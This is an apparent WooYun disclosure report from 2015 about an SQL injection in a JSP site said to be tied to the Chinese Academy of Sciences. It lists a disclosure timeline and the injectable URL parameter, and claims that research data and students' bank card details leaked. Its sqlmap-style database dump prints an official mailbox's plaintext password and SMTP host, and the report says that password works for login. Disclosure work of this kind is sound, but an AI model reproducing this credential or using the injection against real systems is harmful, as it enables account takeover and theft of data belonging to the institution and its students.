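2015-04-07: Details reported to the vendor; awaiting vendor handling.
2015-04-13: The vendor chose to ignore the vulnerability; details disclosed to the public.
Research data was leaked, including a large amount of data on the ecological environment, along with graduate students' bank card information, the official mailbox password and more. The research data is related to the Chinese Academy of Sciences.
Injection point: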
1.http://**.**.**/index.jspID_lanmu=1
Some of the data tables (the data is very detailed in every area):
The official mailbox was leaked; the password can be used to log in to the Sohu mailbox:
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
Database: ESApp
Table: email
[1 entry]
+-----------------+----------+---------------+------+
| name            | password | stmp          | CN   |
+-----------------+----------+---------------+------+
| [email protected] | 68756834 | mail.sohu.com | NULL |
+-----------------+----------+---------------+------+
Sohu mailbox screenshot:
Severity: no impact (ignored by vendor)
Ignored at: 2015-04-13 16:58
Vulnerability Rank: 4 (WooYun rating)
None yet